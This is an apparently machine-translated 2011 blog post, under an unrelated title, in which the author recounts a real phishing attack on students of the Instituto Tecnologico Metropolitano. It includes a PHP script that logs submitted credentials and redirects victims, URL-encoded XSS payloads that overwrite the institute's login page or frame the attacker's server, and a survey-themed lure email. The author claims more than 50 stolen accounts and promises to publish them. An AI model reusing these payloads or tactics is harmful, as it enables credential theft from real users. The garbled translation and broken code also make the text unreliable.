Thursday, April 7, 2011

Sky Sports Jim White Age

Phishing Phishing ITM ITM

Explanation ITM
Phishing
As I see that research is a success, explain how the procedure was implemented to obtain the user accounts of students Metropolitan Institute of Technology (ITM). Mainly know that the browser is vulnerable to XSS -I remember an exhibition on the subject of mother tongue last fall, where he talks of the main mistakes- programmers, I first had some questions that my friends helped me solve one of them was how to do to hide the original content of this page to put my malicious code. Knew was done with JavaScript, but did not know he was. My friend Yoyahack , saying it helped me was as follows.
 # 
document.body.innerHTML = 'Hello World';
#

now as it had, went straight to the XSS and perform the following Proof of Concept (PoC) , gave me some errors by the double quotes simple, special characters, I got bit by looking to see how I could fix it. After a while, the errors disappeared with some modifications that I made and Phishing page was complete. Now all that remained was to create the page where captured data sent.

On my server create a file called xss.php with the following code,
 # 
$ sContenido = "";

foreach ($ _POST as $ svar => $ sval) {$ sContenido
.= $ sval. "-" $ sContenido

} .= "\\ n";
$ sPathFile = "XSS.txt"
$ sFileOpen = fopen ($ sPathFile, "a");
fwrite ($ sFileOpen $ sContenido)
fclose ($ sFileOpen)

header ("Location: http://www.itm.edu.co/Decanaturas/ValidaClaveAlumnos.asp?)
#

The above code captures all the POST method variables and stores them in a text file called XSS.txt , saving data is re-routed to the original page that validates the input data, and as we do not send data directly to that page will jump a error (Figure 1) , this in turn is re-routed to the original login.
Figure 1: error message.

already had everything complete, it was time to do local tests to see if it worked or had other errors. Enter my STRING
malicious
were many, too many characters and so far had no nungin problem. I extracted some code to display it.
 
# "% 3Cscript% 3Edocument.body.innerHTML% 20 =% 22% 3Chtml% 20xmlns = 'http://www.w3.org/1999
/ xhtml'% 3E% 3E% 3Chead% 3Cstyle% 20type = 'text / css'% 3E% 3E% 3C/style% 3Cmeta%
20http-equiv = "Content-Type'% 20content = 'text / html;% 20charset = iso-8859-1'% 3E% 3Ctitle% 3EITM% 20 -% 20%
Institute 20Tecnol% C3% B3gico% 20Metropolitano% 3C/title% 3E% 3Clink% 20rel = 'stylesheet'
% 20type = 'text / css'% 20href = 'index.css'% 3E% 3C / head% 3E% 3Cbody% 3E% 3Cdiv% 20id = 'wrapper'
% 3E% 3Cdiv% 20id = 'header'% 3E% 3Cdiv% 20id = 'header-left'% 3E% 3CA% 20href = 'http:// www.itm.
edu.co '% 3E% 3Cimg% 20src =' images / logoITM.png "% 20alt = 'portal%' 20title% = '20ITM portal
0ITM% 2'% 3E% 3C / a% 3E% 3C/div% 3E% 3Cdiv% 20ID = 'header-right'% 3E% 3Cdiv% 20ID = 'topmenu'% 3E% 3C% 3E% 3Cspan
p% 20style = 'color:% 20rgb (11, 20 141%,% 20178);% 20 '%% 3EEnglish 20version 3C/sp
% to% 3E% 20
estiondelaCalidad.aspx '"#



But when sending the POST request my file in my server, got an error
(Figure 2)
, so I got to thinking about how could solve the problem, I guess that the error was in the amount of characters that were used.
Figure 2: Error So I used that as an easy way
upon receiving the data on my server.

iframe and the code I wrote was injected directly in a page on my server. Now change the malicious code,
# % 3Cscript% 3E
document.body.innerHTML% 20 =% 22% 3Ciframe
 
% 20src = 'http:// [MI-SERVER] / xss / index.php % 20width = '100% '% 20height = '100%'% 3E% 3C/iframe

% 22% 3E% 3C/script% 3E

#


is not the best option because you see the scroll, pfff but wanted to do it quickly and I only found this solution.

had already created to send emails from the social engineering for students enter and write his book on my page Phishing. Among my personal mail of the institution and look to see which was the topic that stood out and had more repetitions, and the topic was the mailing had surveys in the institution, so that was the issue.
also had the problem that the mail that was created was to hotmail, so when I sent an e-mail to other students, is coming to the tray of SPAM, so some or it would, you could get me one of the institution itself but I would take more time.
As previously said the issue that I will use to deceive the student surveys, so I sent a general email with the following information
(Figure 3)
.
Figure 3:
Mail sent to the malicious link.
Now that everything is ready and sent mail, I waited about 5 hours and the result was very satisfactory since in that time I have won more than 50 user accounts.
As if it had achieved original account of the institution, is talking about come directly to your inbox
.
For now is all, wait to see more results I have.

NOTE:
In 5 days I will write to put the full disclosure of information collected.

0 comments:

Post a Comment